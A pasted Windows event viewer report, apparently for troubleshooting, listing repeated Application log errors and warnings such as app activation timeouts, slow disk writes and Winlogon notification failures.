Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.
Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.
Context: Application, SystemIndex Catalog
Details:
The system cannot find the file specified. (HRESULT : 0x80070002) (0x80070002)
Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.
Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.
Context: Application, SystemIndex Catalog
Details:
The system cannot find the file specified. (HRESULT : 0x80070002) (0x80070002)
Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.
Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.
Context: Application, SystemIndex Catalog
Details:
The system cannot find the file specified. (HRESULT : 0x80070002) (0x80070002)
Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
